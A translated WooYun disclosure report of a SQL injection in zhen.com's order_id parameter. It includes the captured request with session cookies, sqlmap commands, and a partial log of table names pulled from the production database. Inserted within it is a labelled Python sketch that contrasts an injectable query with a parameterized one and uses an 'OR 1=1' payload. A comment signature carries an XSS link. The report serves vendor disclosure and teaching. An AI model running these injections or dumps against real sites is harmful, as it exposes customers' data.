
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0118300

Title: 珍品网 high-risk SQL injection vulnerability (could expose the information of more than a million users)

Vendor: 珍品网

Author: DloveJ

Submitted: 2015-06-05 10:27

Fixed: 2015-07-20 10:34

Published: 2015-07-20 10:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-05: Details sent to the vendor, awaiting vendor handling
2015-06-05: Vendor confirmed; details disclosed to the vendor only
2015-06-15: Details disclosed to core white hats and experts in related fields
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public

Brief description:

Only the wealthy shop there. 珍品网 (zhen.com); no further explanation needed.

Detailed description:

The impact is considerable given the volume of data involved.
First, register a user account normally and place an order.

[image: 11.jpg]


Open the order list and click through to the order details.

[image: 22.jpg]


This is the spot. Refresh the page and capture the request:

GET /?c=order&a=see&order_id=140089 HTTP/1.1
Host: my.zhen.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=1188675584; pgv_si=s1319450624; _gat=1; auth=2ba9OqJZ%2BAfL44hUExMxdNoUHIczhV%2BLGn%2FNbf5urpK1N8t36bVLiH%2BAIlS8AH01yQloZn6chqQLilAKlYqBZbjly77T8BFsYKU; token=ec280229-87a7-415a-91e0-d7b1d0cb0197; PHPSESSID=9778cb88df1a34adb0d919f8eb931803; profile_416618=416618; _ga=GA1.2.426808257.1433499462; __utmt=1; __utma=229912279.426808257.1433499462.1433502379.1433502379.1; __utmb=229912279.3.10.1433502379; __utmc=229912279; __utmz=229912279.1433502379.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OZ_1U_1590=vid=v57177485be963.0&ctime=1433502467&ltime=1433502380; OZ_1Y_1590=erefer=-&eurl=http%3A//www.zhen.com/&etime=1433499463&ctime=1433502467&ltime=1433502380&compid=1590; NTKF_T2D_CLIENTID=guest943D6947-EDBC-40E2-AB3C-C31E6355DC28; nTalk_CACHE_DATA={uid:kf_9999_ISME9754_guest943D6947-EDBC-40,tid:1433499472227849}
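The injectable input is the order_id parameter of the order-details request captured above. The page shows no server-side code, so the following is an added example, not code from the page or from 珍品网: a Python/sqlite3 sketch of the concatenation pattern that makes such an endpoint injectable, beside a hardened handler that type-checks the id, binds it as a query parameter, and lets the query itself enforce that the order belongs to the logged-in user. Table layout, the owner ids and the second order are constructed for the example; only order_id 140089 comes from the captured request.

```python
import sqlite3

# Constructed sample data (not from the page): two customers, one order each.
ORDERS = [
    (140089, 416618, 99.0),   # order_id from the captured request; owner id constructed
    (140090, 999, 12.5),      # a different customer's order
]


def build_db():
    """In-memory SQLite stand-in for the shop database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (order_id INTEGER PRIMARY KEY, user_id INTEGER, total REAL)"
    )
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", ORDERS)
    return conn


def see_order_vulnerable(conn, order_id):
    """Assumed shape of the injectable handler behind ?c=order&a=see&order_id=...:
    the raw request parameter is concatenated into the SQL text."""
    sql = "SELECT order_id, user_id, total FROM orders WHERE order_id = " + order_id
    return conn.execute(sql).fetchall()


def see_order_fixed(conn, order_id, current_user_id):
    """Hardened handler: reject anything that is not an integer, bind the value
    as a parameter, and restrict the row to the current user's own orders."""
    if not order_id.isdigit():
        raise ValueError("order_id must be a positive integer")
    sql = (
        "SELECT order_id, user_id, total FROM orders "
        "WHERE order_id = ? AND user_id = ?"
    )
    return conn.execute(sql, (int(order_id), current_user_id)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # A tautology appended to the id makes the concatenated query return every order.
    print(see_order_vulnerable(db, "140089 OR 1=1"))
    # The hardened handler rejects the non-numeric input outright...
    try:
        see_order_fixed(db, "140089 OR 1=1", 416618)
    except ValueError as err:
        print("rejected:", err)
    # ...and also refuses to show another customer's order even for a valid id.
    print(see_order_fixed(db, "140090", 416618))
```

The ownership predicate in the query matters independently of the injection: even with parameter binding, a numeric order_id that is looked up without a user_id check would let any logged-in customer read any other customer's order.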


-r 1.txt


[image: 1.jpg]


-r 1.txt --privileges


[image: 2.jpg]


-r 1.txt --current


[image: 3.jpg]


Tables in the current database:


[19:29:14] [INFO] fetching tables for database: 'shop_zp'
[19:29:14] [INFO] fetching number of tables for database 'shop_zp'
[19:29:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:29:14] [INFO] retrieved: 386
[19:29:18] [INFO] retrieved: app
[19:29:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
_iospush
[19:30:39] [INFO] retrieved: bernardellistores
[19:32:11] [INFO] retrieved: biao_product_tmp
[19:33:39] [INFO] retrieved: comments_robot_bag
[19:35:23] [INFO] retrieved: comments_robot_cosmetics
[19:36:31] [INFO] retrieved: comments_robot_scarf_nv
[19:37:40] [INFO] retrieved: comments_robot_shoe
[19:38:20] [INFO] retrieved: coo8_brand
[19:39:13] [INFO] retrieved: coo8_result
[19:39:52] [INFO] retrieved: goods_id_20131231
[19:41:34] [INFO] retrieved: gt _special_qing_list
[19:43:38] [INFO] retrieved: gt_360_event_list
[19:45:08] [INFO] retrieved: gt_ac
[19:45:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
t
[19:46:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
ivity
[19:46:44] [INFO] retrieved: gt_activity_cart
[19:47:29] [INFO] retrieved: gt_activity_condition
[19:48:33] [INFO] retrieved: gt_activity_gift
[19:49:20] [INFO] retrieved: gt_activity_iphone6_2014
[19:50:54] [INFO] retrieved: gt_act
[19:51:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
ivity_
[19:51:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
l
[19:52:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
o
[19:52:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
g
[19:52:46] [INFO] retrieved: g
[19:53:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[19:53:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
t_activity_news
[19:53:59] [INFO] retrieved: gt_activity_range
[19:54:48] [INFO] retrieved: gt_activity_range_20150410
[19:56:09] [INFO] retrieved: gt_activity_rule
[19:56:45] [INFO] retrieved: gt_activity_type
[19:57:23] [INFO] retrieved: gt_add_images
[19:58:39] [INFO] retrieved: gt_ads_chanet
[19:59:41] [INFO] retrieved: gt_ads_
[20:00:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
duomai
[20:00:38] [INFO] retrieved: gt_ads_eshop
[20:01:22] [INFO] retrieved: gt_ads_linktech
[20:02:24] [INFO] retrieved: gt_ads_sina
[20:03:01] [INFO] retrieved: gt_ads_sohu
[20:03:30] [INFO] retrieved: gt_ads_woaisheng
[20:04:44] [INFO] retrieved: gt_ads_yoyi
[20:05:17] [INFO] retrieved: gt_amazon_orders
[20:06:29] [INFO] retrieved: gt_amazon_products
[20:07:39] [INFO] retrieved: gt_amazon_submit_log
[20:08:50] [INFO] retrieved: gt_ana_collation
[20:10:18] [INFO] retrieved: gt_ana_origin_info
[20:11:41] [INFO] retrieved: gt_analyse_brand_sales
[20:13:28] [INFO] retrieved: gt_analyse_category_sales
[20:15:13] [INFO] retrieved: gt_analyse_color_sal
[20:16:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
es
[20:16:35] [INFO] retrieved: gt_analyse_member_order_sales
[20:18:35] [INFO] retrieved: gt_analyse_member_quantity_sales
[20:20:22] [INFO] retrieved: gt_analyse_price_sales
[20:21:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:21:53] [INFO] retrieved: gt_analyse_product_sales
[20:23:15] [INFO] retrieved: gt_analyse_refund_order
[20:24:39] [INFO] retrieved: gt_analyse_region_order
[20:25:53] [INFO] retrieved: gt_analyse_sale_order
[20:27:13] [INFO] retrieved: gt_analyse_spec_value_sales
[20:28:54] [INFO] retrieved: gt_analyse_stock_change
[20:30:10] [INFO] retrieved: gt_app_publicity
[20:31:27] [INFO] retrieved: gt_app_send_user
[20:32:31] [INFO] retrieved: gt_app_spec_group
[20:33:31] [INFO] retrieved: gt_app_spec_price
[20:34:19] [INFO] retrieved: gt_attribute
[20:35:13] [INFO] retrieved: gt_attribute_values
[20:36:09] [INFO] retrieved: gt_bank_actively
[20:37:38] [INFO] retrieved: gt_batch_edit_product
[20:39:19] [INFO] retrieved: gt_batch_edit_product_spec
[20:40:12] [INFO] retrieved: gt_batch_edit_task
[20:40:55] [INFO] retrieved: gt_book
[20:41:28] [INFO] retrieved: gt_book_evaluate
[20:42:26] [INFO] retrieved: gt_book_recom_goods
[20:43:42] [INFO] retrieved: gt_book_recom_group
[20:44:30] [INFO] retrieved: gt_book_recom_group_goods
[20:45:19] [INFO] retrieved: gt_book_watch
[20:46:01] [INFO] retrieved: gt_bran
[20:46:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
d_seo
[20:47:15] [INFO] retrieved: gt_cancel_reason
[20:48:34] [INFO] retrieved: gt_card
[20:48:57] [INFO] retrieved: gt_card_batch
[20:49:38] [INFO] retrieved: gt_card_batch_150407
[20:50:33] [INFO] retrieved: gt_card_batch_log
[20:51:12] [INFO] retrieved: gt_card_range
[20:52:01] [INFO] retrieved: gt_cart
[20:52:16] [INFO] retrieved: gt_cart_new
[20:52:47] [INFO] retrieved: gt_cate_attr_values
[20:54:31] [INFO] retrieved: gt_category_attribute
[20:56:02] [INFO] retrieved: gt_category_card
[20:56:36] [INFO] retrieved: gt_category_map
[20:57:06] [INFO] retrieved: gt_category_seo
[20:57:34] [INFO] retrieved: gt_category_size_img
[20:58:28] [INFO] retrieved: gt_change_stock
[20:59:51] [INFO] retrieved: gt_collect_arrive_attention
[21:01:54] [INFO] retrieved: gt_combination
[21:02:57] [INFO] retrieved: gt_combination_group
[21:03:44] [INFO] retrieved: gt_combination_log
[21:04:16] [INFO] retrieved: gt_combination_products
[21:05:19] [INFO] retrieved: gt_company_members
[21:06:43] [INFO] retrieved: gt_consumption_member
[21:08:28] [INFO] retrieved: gt_coo8_result
[21:09:29] [INFO] retrieved: gt_coupon_blank_receive
[21:11:34] [INFO] retrieved: gt_coupon_card_channel
[21:12:49] [INFO] retrieved: gt_coupon_car


The run is still going; I am submitting the report first.

Proof of vulnerability:

I won't spell out the impact; a high rank will do.

Fix recommendation:

Copyright notice: when reposting, credit the source DloveJ@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2015-06-05 10:32

Vendor reply:

Thanks!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-06-05 12:49 | DloveJ ( Regular white hat | Rank:1107 Vulnerabilities:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    The vendor is great! Is there a gift? Just asking! @珍品网